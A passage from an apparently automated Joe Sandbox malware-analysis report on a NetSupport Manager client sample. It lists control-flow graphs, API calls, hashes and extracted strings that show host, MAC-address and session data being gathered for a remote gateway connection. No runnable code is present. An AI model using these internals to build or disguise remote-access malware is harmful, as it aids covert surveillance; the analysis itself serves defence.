                                                                                                      • Opcode ID: a9e638ff69f1124c323ad2d8e1e7c75ea6f1f7704d0975bff64711fd33ab6bf8
                                                                                                      • Instruction ID: 27af1d42f1b4f6ddb2c14770db7fbacfca67435089f052a3aa779117de4136e9
                                                                                                      • Opcode Fuzzy Hash: a9e638ff69f1124c323ad2d8e1e7c75ea6f1f7704d0975bff64711fd33ab6bf8
                                                                                                      • Instruction Fuzzy Hash: 3CE25D75F0022AABEF15DBE4DC80FADF7A5AB4474CF904068E925AB3C4D770A944CB52

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1128 1102db00-1102db50 call 1110f420 1131 1102db52-1102db66 call 11142a60 1128->1131 1132 1102db68 1128->1132 1133 1102db6e-1102dbb3 call 11142290 call 11142ac0 1131->1133 1132->1133 1140 1102dd53-1102dd62 call 11144dc0 1133->1140 1141 1102dbb9 1133->1141 1147 1102dd68-1102dd78 1140->1147 1143 1102dbc0-1102dbc3 1141->1143 1145 1102dbc5-1102dbc7 1143->1145 1146 1102dbe8-1102dbf1 1143->1146 1148 1102dbd0-1102dbe1 1145->1148 1149 1102dbf7-1102dbfe 1146->1149 1150 1102dd24-1102dd3d call 11142ac0 1146->1150 1151 1102dd7a 1147->1151 1152 1102dd7f-1102dd93 call 1102cc10 1147->1152 1148->1148 1153 1102dbe3 1148->1153 1149->1150 1154 1102dcf3-1102dd08 call 11162de7 1149->1154 1155 1102dc05-1102dc07 1149->1155 1156 1102dd0a-1102dd1f call 11162de7 1149->1156 1157 1102dc9a-1102dccd call 111618c1 call 11142290 1149->1157 1158 1102dcdb-1102dcf1 call 11164010 1149->1158 1159 1102dc8b-1102dc95 1149->1159 1160 1102dccf-1102dcd9 1149->1160 1161 1102dc4c-1102dc52 1149->1161 1162 1102dc7c-1102dc86 1149->1162 1150->1143 1180 1102dd43-1102dd45 1150->1180 1151->1152 1175 1102dd98-1102dd9d 1152->1175 1153->1150 1154->1150 1155->1150 1171 1102dc0d-1102dc47 call 111618c1 call 11142290 call 1102cc10 1155->1171 1156->1150 1157->1150 1158->1150 1159->1150 1160->1150 1164 1102dc54-1102dc68 call 11162de7 1161->1164 1165 1102dc6d-1102dc77 1161->1165 1162->1150 1164->1150 1165->1150 1171->1150 1181 1102de43-1102de5d call 111463d0 1175->1181 1184 1102dda3-1102ddc8 call 110b7920 call 11146450 1175->1184 1180->1181 1182 1102dd4b-1102dd51 1180->1182 1194 1102deb3-1102debf call 1102b4f0 1181->1194 1195 1102de5f-1102de78 call 1105dd10 1181->1195 1182->1140 1182->1147 1205 1102ddd3-1102ddd9 1184->1205 1206 1102ddca-1102ddd1 1184->1206 1208 1102dec1-1102dec8 1194->1208 1209 1102de98-1102de9f 1194->1209 1195->1194 1207 1102de7a-1102de8c 1195->1207 1210 1102dddb-1102dde2 call 11027d60 1205->1210 1211 1102de39 1205->1211 1206->1181 1207->1194 1224 1102de8e 1207->1224 1212 1102dea5-1102dea8 1208->1212 1213 1102deca-1102ded4 1208->1213 1209->1212 1215 1102e0aa-1102e0cb GetComputerNameA 1209->1215 1210->1211 1223 1102dde4-1102de16 1210->1223 1211->1181 1217 1102deaa-1102deb1 call 110b7920 1212->1217 1218 1102ded9 1212->1218 1213->1215 1220 1102e103-1102e109 1215->1220 1221 1102e0cd-1102e101 call 11027c30 1215->1221 1222 1102dedc-1102dfb6 call 110278e0 call 11027be0 call 110278e0 * 2 LoadLibraryA GetProcAddress 1217->1222 1218->1222 1226 1102e10b-1102e110 1220->1226 1227 1102e13f-1102e152 call 11164010 1220->1227 1221->1220 1247 1102e157-1102e163 1221->1247 1280 1102e07a-1102e082 SetLastError 1222->1280 1281 1102dfbc-1102dfd3 1222->1281 1242 1102de20-1102de2f call 110f6080 1223->1242 1243 1102de18-1102de1e 1223->1243 1224->1209 1232 1102e116-1102e11a 1226->1232 1240 1102e347-1102e36a 1227->1240 1237 1102e136-1102e138 1232->1237 1238 1102e11c-1102e11e 1232->1238 1239 1102e13b-1102e13d 1237->1239 1245 1102e132-1102e134 1238->1245 1246 1102e120-1102e126 1238->1246 1239->1227 1239->1247 1258 1102e392-1102e39a 1240->1258 1259 1102e36c-1102e372 1240->1259 1249 1102de32-1102de34 call 1102d330 1242->1249 1243->1242 1243->1249 1245->1239 1246->1237 1251 1102e128-1102e130 1246->1251 1252 1102e165-1102e17a call 110b7920 call 11029bd0 1247->1252 1253 1102e17c-1102e18f call 11081a70 1247->1253 1249->1211 1251->1232 1251->1245 1285 1102e1d3-1102e1ec call 11081a70 1252->1285 1273 1102e191-1102e1b4 1253->1273 1274 1102e1b6-1102e1b8 1253->1274 1264 1102e3ac-1102e438 call 111618c1 * 2 call 11146450 * 2 GetCurrentProcessId call 110eddd0 call 11027c90 call 11146450 call 11161d01 1258->1264 1265 1102e39c-1102e3a9 call 11035dd0 call 111618c1 1258->1265 1259->1258 1263 1102e374-1102e38d call 1102d330 1259->1263 1263->1258 1265->1264 1273->1285 1279 1102e1c0-1102e1d1 1274->1279 1279->1279 1279->1285 1282 1102e043-1102e04f 1280->1282 1281->1282 1299 1102dfd5-1102dfde 1281->1299 1288 1102e092-1102e0a1 1282->1288 1289 1102e051-1102e05d 1282->1289 1303 1102e1f2-1102e26d call 11146450 call 110cfc30 call 110d1480 call 110b7920 wsprintfA call 110b7920 wsprintfA 1285->1303 1304 1102e32c-1102e339 call 11164010 1285->1304 1288->1215 1295 1102e0a3-1102e0a4 FreeLibrary 1288->1295 1297 1102e06f-1102e073 1289->1297 1298 1102e05f-1102e06d GetProcAddress 1289->1298 1295->1215 1300 1102e084-1102e086 SetLastError 1297->1300 1301 1102e075-1102e078 1297->1301 1298->1297 1299->1282 1305 1102dfe0-1102e016 call 11146450 call 1112b270 1299->1305 1307 1102e08c 1300->1307 1301->1307 1340 1102e283-1102e299 call 11128ec0 1303->1340 1341 1102e26f-1102e27e call 11029450 1303->1341 1319 1102e33c-1102e341 CharUpperA 1304->1319 1305->1282 1323 1102e018-1102e03e call 11146450 call 11027920 1305->1323 1307->1288 1319->1240 1323->1282 1345 1102e2b2-1102e2ec call 110d0bd0 * 2 1340->1345 1346 1102e29b-1102e2ad call 110d0bd0 1340->1346 1341->1340 1353 1102e302-1102e32a call 11164010 call 110d07c0 1345->1353 1354 1102e2ee-1102e2fd call 11029450 1345->1354 1346->1345 1353->1319 1354->1353
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: _malloc_memsetwsprintf
                                                                                                      • String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$14/03/16 10:38:31 V12.10F8$849224$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSM.LIC$NSMWClass$TCPIP$TSMode$Trying to get mac addr for %u.%u.%u.%u$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape$ts macaddr=%s
                                                                                                      • API String ID: 3802068140-3420351806
                                                                                                      • Opcode ID: 8d7e34653a530cc98d4c7b142cb31fa2942002c12a1f4f3c66c79a8befd3f6be
                                                                                                      • Instruction ID: 727bed6a5d63171c4319a8bac454151215a042d106ed124055d9f0508de139ba
                                                                                                      • Opcode Fuzzy Hash: 8d7e34653a530cc98d4c7b142cb31fa2942002c12a1f4f3c66c79a8befd3f6be
                                                                                                      • Instruction Fuzzy Hash: 7932D275D0022A9FDF12DFA4DC84BEDB7B8AB44308F9445E9E55867280EB70AF84CB51

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1780 6c763d00-6c763d42 call 6c771c50 call 6c763b80 1784 6c763d47-6c763d4f 1780->1784 1785 6c763d51-6c763d6b call 6c7728e1 1784->1785 1786 6c763d6c-6c763d6e 1784->1786 1788 6c763d87-6c763da1 call 6c758fb0 1786->1788 1789 6c763d70-6c763d84 call 6c756f50 1786->1789 1795 6c763dc5-6c763e44 call 6c755e90 * 2 call 6c767be0 call 6c755e20 lstrlenA 1788->1795 1796 6c763da3-6c763dc4 call 6c7563c0 call 6c7728e1 1788->1796 1789->1788 1809 6c763e46-6c763e95 call 6c76d8b0 call 6c755060 call 6c754830 call 6c771bfd 1795->1809 1810 6c763e98-6c763fbe call 6c755500 call 6c756050 call 6c767c70 * 2 call 6c767d00 * 3 call 6c755060 call 6c767d00 call 6c771bfd call 6c767d00 gethostname call 6c767d00 call 6c75b8e0 1795->1810 1809->1810 1845 6c763fc5-6c763fe1 call 6c767d00 1810->1845 1846 6c763fc0 1810->1846 1849 6c763fe3-6c763ff5 call 6c767d00 1845->1849 1850 6c763ff8-6c763ffe 1845->1850 1846->1845 1849->1850 1852 6c764004-6c764022 call 6c755e20 1850->1852 1853 6c76421a-6c764263 call 6c767b60 call 6c771bfd call 6c7598d0 call 6c7677e0 1850->1853 1860 6c764024-6c764057 call 6c755060 call 6c767d00 call 6c771bfd 1852->1860 1861 6c76405a-6c764084 call 6c755e20 1852->1861 1881 6c764265-6c764291 call 6c75a4e0 call 6c7728e1 1853->1881 1882 6c764292-6c7642aa call 6c7728e1 1853->1882 1860->1861 1870 6c7641d1-6c764217 call 6c767d00 call 6c755e20 call 6c767d00 1861->1870 1871 6c76408a-6c7641ce call 6c755060 call 6c767d00 call 6c771bfd call 6c755e20 call 6c755060 call 6c767d00 call 6c771bfd call 6c755e20 call 6c755060 call 6c767d00 call 6c771bfd call 6c755e20 call 6c755060 call 6c767d00 call 6c771bfd 1861->1871 1870->1853 1871->1870
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3511114217.000000006C751000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C750000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3511098641.000000006C750000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511143904.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511160154.000000006C799000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511206673.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_6c750000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: _memset
                                                                                                      • String ID: *Dept$*Gsk$1.1$849224$A1=%s$A2=%s$A3=%s$A4=%s$APPTYPE=%d$CHATID$CHATID=%s$CLIENT_ADDR=%s$CLIENT_NAME=%s$CLIENT_VERSION=1.0$CMD=OPEN$CMPI=%u$DEPT=%s$GSK=%s$HOSTNAME=%s$ListenPort$MAXPACKET=%d$PORT=%d$PROTOCOL_VER=%u.%u$Port$TCPIP$client247$connection_index == 0$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c
                                                                                                      • API String ID: 2102423945-3152206910
                                                                                                      • Opcode ID: c56af8fa74a22c669a61ccb472b6745aeaafdd96584eb59c27313788a412547e
                                                                                                      • Instruction ID: b90c40b4f9b2ae00a2e015fe5e0ea9269a346217cb93952ed61042696aa55a85
                                                                                                      • Opcode Fuzzy Hash: c56af8fa74a22c669a61ccb472b6745aeaafdd96584eb59c27313788a412547e
                                                                                                      • Instruction Fuzzy Hash: 2CE1A4B2D0011C6BCB25DB60DE99EEFB77C9F04345F4045D9E90967A41EB30AB888FA1

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 2021 110a9c90-110a9cf2 LoadLibraryA GetProcAddress 2022 110a9cf8-110a9d09 SetupDiGetClassDevsA 2021->2022 2023 110a9e05-110a9e0d SetLastError 2021->2023 2024 110a9d0f-110a9d1d 2022->2024 2025 110a9f13-110a9f15 2022->2025 2028 110a9e19-110a9e1b SetLastError 2023->2028 2029 110a9d20-110a9d24 2024->2029 2026 110a9f1e-110a9f20 2025->2026 2027 110a9f17-110a9f18 FreeLibrary 2025->2027 2030 110a9f37-110a9f52 call 11161d01 2026->2030 2027->2026 2031 110a9e21-110a9e2c GetLastError 2028->2031 2032 110a9d3d-110a9d55 2029->2032 2033 110a9d26-110a9d37 GetProcAddress 2029->2033 2034 110a9e32-110a9e3d call 11162be5 2031->2034 2035 110a9ec0-110a9ed1 GetProcAddress 2031->2035 2032->2031 2044 110a9d5b-110a9d5d 2032->2044 2033->2028 2033->2032 2034->2029 2038 110a9edb-110a9edd SetLastError 2035->2038 2039 110a9ed3-110a9ed9 SetupDiDestroyDeviceInfoList 2035->2039 2043 110a9ee3-110a9ee5 2038->2043 2039->2043 2043->2025 2045 110a9ee7-110a9f09 CreateFileA 2043->2045 2046 110a9d68-110a9d6a 2044->2046 2047 110a9d5f-110a9d65 call 11162be5 2044->2047 2051 110a9f0b-110a9f10 call 11162be5 2045->2051 2052 110a9f22-110a9f2c call 11162be5 2045->2052 2049 110a9d6c-110a9d7f GetProcAddress 2046->2049 2050 110a9d85-110a9d9b 2046->2050 2047->2046 2049->2050 2054 110a9e42-110a9e4a SetLastError 2049->2054 2060 110a9d9d-110a9da6 GetLastError 2050->2060 2061 110a9dac-110a9dbf call 11162b51 2050->2061 2051->2025 2062 110a9f2e-110a9f2f FreeLibrary 2052->2062 2063 110a9f35 2052->2063 2054->2060 2060->2061 2064 110a9e81-110a9e92 call 110a9c30 2060->2064 2071 110a9ea2-110a9eb3 call 110a9c30 2061->2071 2072 110a9dc5-110a9dcd 2061->2072 2062->2063 2063->2030 2069 110a9e9b-110a9e9d 2064->2069 2070 110a9e94-110a9e95 FreeLibrary 2064->2070 2069->2030 2070->2069 2071->2069 2078 110a9eb5-110a9ebe FreeLibrary 2071->2078 2074 110a9dcf-110a9de2 GetProcAddress 2072->2074 2075 110a9de4-110a9dfb 2072->2075 2074->2075 2077 110a9e4f-110a9e51 SetLastError 2074->2077 2079 110a9e57-110a9e71 call 110a9c30 call 11162be5 2075->2079 2081 110a9dfd-110a9e00 2075->2081 2077->2079 2078->2030 2079->2069 2086 110a9e73-110a9e7c FreeLibrary 2079->2086 2081->2029 2086->2030
                                                                                                      APIs
                                                                                                      • LoadLibraryA.KERNEL32(setupapi.dll,4764EAAA,?,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,11184778), ref: 110A9CC3
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetupDiGetClassDevsA), ref: 110A9CE7
                                                                                                      • SetupDiGetClassDevsA.SETUPAPI(111A6E0C,00000000,00000000,00000012,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF), ref: 110A9D01
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetupDiEnumDeviceInterfaces), ref: 110A9D2C
                                                                                                      • _free.LIBCMT ref: 110A9D60
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110A9D72
                                                                                                      • GetLastError.KERNEL32 ref: 110A9D9D
                                                                                                      • _malloc.LIBCMT ref: 110A9DB3
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110A9DD5
                                                                                                      • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF,?,1102F1AA,Client), ref: 110A9E07
                                                                                                      • SetLastError.KERNEL32(00000078), ref: 110A9E1B
                                                                                                      • GetLastError.KERNEL32 ref: 110A9E21
                                                                                                      • _free.LIBCMT ref: 110A9E33
                                                                                                      • SetLastError.KERNEL32(00000078), ref: 110A9E44
                                                                                                      • SetLastError.KERNEL32(00000078), ref: 110A9E51
                                                                                                      • _free.LIBCMT ref: 110A9E64
                                                                                                      • FreeLibrary.KERNEL32(?,?), ref: 110A9E74
                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,11184778,000000FF,?,1102F1AA,Client), ref: 110A9F18
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$AddressProc$Library_free$Free$ClassDevsLoadSetup_malloc
                                                                                                      • String ID: SetupDiDestroyDeviceInfoList$SetupDiEnumDeviceInterfaces$SetupDiGetClassDevsA$SetupDiGetDeviceInterfaceDetailA$setupapi.dll
                                                                                                      • API String ID: 3464732724-3340099623
                                                                                                      • Opcode ID: f516254d0abd54e50715bca7ef5168f810df5caaca2cd717629c9093cd8c9f4a
                                                                                                      • Instruction ID: 033bff87456eb4c9bd2d5bbaba34d7345019b106b940800e90953e4c12ebf53e
                                                                                                      • Opcode Fuzzy Hash: f516254d0abd54e50715bca7ef5168f810df5caaca2cd717629c9093cd8c9f4a
                                                                                                      • Instruction Fuzzy Hash: F2816279E14259ABEB04DFF4EC84F9FFBB8AF48704F104528F921A6284EB759905CB50

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 2283 11133920-1113395c 2284 11133962-11133984 call 1105dd10 2283->2284 2285 11133c84-11133c9f call 11161d01 2283->2285 2284->2285 2290 1113398a-1113399e GetLocalTime 2284->2290 2291 111339c1-11133a43 LoadLibraryA call 110098c0 call 11015c30 GetCurrentProcess 2290->2291 2292 111339a0-111339bc call 11146450 2290->2292 2299 11133a45-11133a5b GetProcAddress 2291->2299 2300 11133a5d-11133a64 GetProcessHandleCount 2291->2300 2292->2291 2299->2300 2301 11133a66-11133a68 SetLastError 2299->2301 2302 11133a6e-11133a76 2300->2302 2301->2302 2303 11133a92-11133a9e 2302->2303 2304 11133a78-11133a90 GetProcAddress 2302->2304 2307 11133aa0-11133ab8 GetProcAddress 2303->2307 2308 11133aba-11133ac5 2303->2308 2304->2303 2305 11133ac7-11133ad2 SetLastError 2304->2305 2305->2307 2307->2308 2309 11133ad4-11133adc SetLastError 2307->2309 2310 11133adf-11133aef GetProcAddress 2308->2310 2309->2310 2311 11133af1-11133afd K32GetProcessMemoryInfo 2310->2311 2312 11133aff-11133b01 SetLastError 2310->2312 2314 11133b07-11133b15 2311->2314 2312->2314 2315 11133b23-11133b2e 2314->2315 2316 11133b17-11133b1f 2314->2316 2317 11133b30-11133b38 2315->2317 2318 11133b3c-11133b47 2315->2318 2316->2315 2317->2318 2319 11133b55-11133b5f 2318->2319 2320 11133b49-11133b51 2318->2320 2321 11133b61-11133b68 2319->2321 2322 11133b6a-11133b6d 2319->2322 2320->2319 2323 11133b6f-11133b7d call 11146450 2321->2323 2322->2323 2324 11133b80-11133b92 2322->2324 2323->2324 2328 11133c5a-11133c68 2324->2328 2329 11133b98-11133baa call 110637c0 2324->2329 2331 11133c6a-11133c6b FreeLibrary 2328->2331 2332 11133c6d-11133c75 2328->2332 2329->2328 2336 11133bb0-11133bd1 call 1105dd10 2329->2336 2331->2332 2334 11133c77-11133c78 FreeLibrary 2332->2334 2335 11133c7a-11133c7f 2332->2335 2334->2335 2335->2285 2337 11133c81-11133c82 FreeLibrary 2335->2337 2340 11133bd3-11133bd9 2336->2340 2341 11133bdf-11133bfb call 1105dd10 2336->2341 2337->2285 2340->2341 2342 11133bdb 2340->2342 2345 11133c06-11133c22 call 1105dd10 2341->2345 2346 11133bfd-11133c00 2341->2346 2342->2341 2350 11133c24-11133c27 2345->2350 2351 11133c2d-11133c49 call 1105dd10 2345->2351 2346->2345 2347 11133c02 2346->2347 2347->2345 2350->2351 2352 11133c29 2350->2352 2355 11133c50-11133c53 2351->2355 2356 11133c4b-11133c4e 2351->2356 2352->2351 2355->2328 2357 11133c55 call 11027780 2355->2357 2356->2355 2356->2357 2357->2328
                                                                                                      APIs
                                                                                                        • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                      • GetLocalTime.KERNEL32(?,_debug,CheckLeaks,00000001,00000000,4764EAAA), ref: 1113398E
                                                                                                      • LoadLibraryA.KERNEL32(psapi.dll), ref: 111339E6
                                                                                                      • GetCurrentProcess.KERNEL32 ref: 11133A27
                                                                                                      • GetProcAddress.KERNEL32(?,GetProcessHandleCount), ref: 11133A51
                                                                                                      • GetProcessHandleCount.KERNEL32(00000000,?), ref: 11133A62
                                                                                                      • SetLastError.KERNEL32(00000078), ref: 11133A68
                                                                                                      • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11133A84
                                                                                                      • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11133AAC
                                                                                                      • SetLastError.KERNEL32(00000078), ref: 11133AC9
                                                                                                      • SetLastError.KERNEL32(00000078), ref: 11133AD6
                                                                                                      • GetProcAddress.KERNEL32(?,GetProcessMemoryInfo), ref: 11133AE8
                                                                                                      • K32GetProcessMemoryInfo.KERNEL32(?,?,00000028), ref: 11133AFB
                                                                                                      • SetLastError.KERNEL32(00000078), ref: 11133B01
                                                                                                      • FreeLibrary.KERNEL32(?), ref: 11133C6B
                                                                                                      • FreeLibrary.KERNEL32(?), ref: 11133C78
                                                                                                      • FreeLibrary.KERNEL32(?), ref: 11133C82
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AddressErrorLastLibraryProc$FreeProcess$CountCurrentHandleInfoLoadLocalMemoryTime__wcstoi64
                                                                                                      • String ID: CheckLeaks$Client$Date=%04d-%02d-%02d$GetGuiResources$GetProcessHandleCount$GetProcessMemoryInfo$RestartGdiObj$RestartHandles$RestartMB$RestartUserObj$Used handles=%d, gdiObj=%d, userObj=%d, mem=%u kB$_debug$psapi.dll
                                                                                                      • API String ID: 263027137-1001504656
                                                                                                      • Opcode ID: 87783a789c6862cb7a583f6d0127a67f1abf74d6ca2b18a0a01f6916aa137176
                                                                                                      • Instruction ID: 17d7fdf42b282dadbb05295794651177f64ab9c07d211a437ec733fd2e53fcc2
                                                                                                      • Opcode Fuzzy Hash: 87783a789c6862cb7a583f6d0127a67f1abf74d6ca2b18a0a01f6916aa137176
                                                                                                      • Instruction Fuzzy Hash: A3B1BFB1E242699FDB10DFE9CDC0AADFBB6EB48319F10452AE414E7348DB349844CB65

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 2359 1102dbc9 2360 1102dbd0-1102dbe1 2359->2360 2360->2360 2361 1102dbe3 2360->2361 2362 1102dd24-1102dd3d call 11142ac0 2361->2362 2365 1102dd43-1102dd45 2362->2365 2366 1102dbc0-1102dbc3 2362->2366 2367 1102de43-1102de5d call 111463d0 2365->2367 2368 1102dd4b-1102dd51 2365->2368 2369 1102dbc5-1102dbc7 2366->2369 2370 1102dbe8-1102dbf1 2366->2370 2388 1102deb3-1102debf call 1102b4f0 2367->2388 2389 1102de5f-1102de78 call 1105dd10 2367->2389 2371 1102dd53-1102dd62 call 11144dc0 2368->2371 2372 1102dd68-1102dd78 2368->2372 2369->2360 2370->2362 2373 1102dbf7-1102dbfe 2370->2373 2371->2372 2376 1102dd7a 2372->2376 2377 1102dd7f-1102dd9d call 1102cc10 2372->2377 2373->2362 2378 1102dcf3-1102dd08 call 11162de7 2373->2378 2379 1102dc05-1102dc07 2373->2379 2380 1102dd0a-1102dd1f call 11162de7 2373->2380 2381 1102dc9a-1102dccd call 111618c1 call 11142290 2373->2381 2382 1102dcdb-1102dcf1 call 11164010 2373->2382 2383 1102dc8b-1102dc95 2373->2383 2384 1102dccf-1102dcd9 2373->2384 2385 1102dc4c-1102dc52 2373->2385 2386 1102dc7c-1102dc86 2373->2386 2376->2377 2377->2367 2410 1102dda3-1102ddc8 call 110b7920 call 11146450 2377->2410 2378->2362 2379->2362 2398 1102dc0d-1102dc47 call 111618c1 call 11142290 call 1102cc10 2379->2398 2380->2362 2381->2362 2382->2362 2383->2362 2384->2362 2391 1102dc54-1102dc68 call 11162de7 2385->2391 2392 1102dc6d-1102dc77 2385->2392 2386->2362 2417 1102dec1-1102dec8 2388->2417 2418 1102de98-1102de9f 2388->2418 2389->2388 2415 1102de7a-1102de8c 2389->2415 2391->2362 2392->2362 2398->2362 2445 1102ddd3-1102ddd9 2410->2445 2446 1102ddca-1102ddd1 2410->2446 2415->2388 2434 1102de8e 2415->2434 2421 